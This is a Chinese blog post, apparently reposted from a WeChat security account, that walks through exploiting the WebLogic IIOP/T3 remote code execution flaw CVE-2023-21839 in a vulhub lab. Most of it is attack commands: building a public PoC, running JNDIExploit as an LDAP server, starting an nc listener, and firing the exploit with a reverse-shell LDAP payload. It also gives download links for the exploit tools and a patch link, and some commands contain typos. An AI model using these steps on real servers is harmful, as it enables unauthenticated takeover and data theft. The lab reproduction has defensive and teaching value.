Weblogic远程代码执行漏洞 CVE-2023-21839

2023年3月9日22:22:47评论28 views字数 1190阅读3分58秒阅读模式

介绍

WebLogic存在远程代码执行漏洞（CVE-2023-21839），由于Weblogic IIOP/T3协议存在缺陷，当IIOP/T3协议开启时，允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server，漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响范围

WebLogic_Server = 12.2.1.3.0

WebLogic_Server = 12.2.1.4.0

WebLogic_Server = 14.1.1.0.0

环境搭建

环境分为如下情况：

1.攻击机(windows10)：IP地址:192.168.19.130

2.漏洞机器(centos8)：dockers服务 IP地址:192.168.19.134

漏洞机器搭建

1.利用vulhub一键搭建环境，已安装了vulhub可以直接更新拉取镜像

cd /usr/local/soft/vulhub/weblogic docker-compose build docker-compose up -d

2.漏洞环境：（12.2.1.3.0）

3.环境搭建成功访问：

http://ip:7001/conosle

漏洞复现：

准备poc

1.下载poc

https://github.com/4ra1n/CVE-2023-21839

安装go环境（本文略过）
执行编译命令

cd cmdgo build -o  CVE-2023-21839.exell

起ldap服务：

1.准备JNDIExploit-1.4-SNAPSHOT.jar，为反弹shell做准备（java环境安装本文略过）

  java -jar JNDIExploit-1.4-SNAPSHOT.jar -i  192.168.19.134

2.监听端口

nc -l 9999

漏洞利用

CVE-2023-21839.exe -ip 192.168.19.134 -port 7001 -ldap ldap://192.168.19.134:1389/Basic/ReverseShell/192.168.19.134/9999

相关链接

补丁下载连接：

https://support.oracle.com/rs?type=doc&id=2917213.2

Weblogic-CVE-2023-21839poc文件下载地址：

链接：https://pan.baidu.com/s/1akarfZGH7Jng6VUz2mNrqQ

提取码：ps6q

Weblogic-CVE-2023-21839.jar下载:

链接：https://pan.baidu.com/s/1akarfZGH7Jng6VUz2mNrqQ

提取码：ps6q

扫描二维码关注我们

Weblogic远程代码执行漏洞 CVE-2023-21839

原文始发于微信公众号（暗影安全）：Weblogic远程代码执行漏洞 CVE-2023-21839

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究，若将其信息做其他用途，由用户承担全部法律及连带责任，本站不承担任何法律及连带责任，请遵守中华人民共和国安全法.

我的微信
微信扫一扫

我的微信公众号
微信扫一扫

Weblogic远程代码执行漏洞 CVE-2023-21839

【漏洞通告】Apache Tomcat 信息泄露漏洞CVE-2023-28708

Minio 敏感信息泄露漏洞(CVE-2023-28432)漏洞复现

CVE-2023-28432: MinIO信息泄露漏洞通告

Nacos 身份认证绕过漏洞QVD-2023-6271

【漏洞通告（二次更新）】Minio 敏感信息泄露漏洞(CVE-2023-28432)

Telos Alliance Omnia MPX Node信息泄露漏洞(CVE-2022-36642)

CVE-2023-20860：Spring Framework身份验证绕过漏洞通告

速修复这些Netgear Orbi路由器漏洞

【漏洞通告（已复现）】Minio 敏感信息泄露漏洞(CVE-2023-28432)

漏洞风险提示 | MinIO 敏感信息泄露漏洞（CVE-2023-28432）

发表评论

在线咨询

微信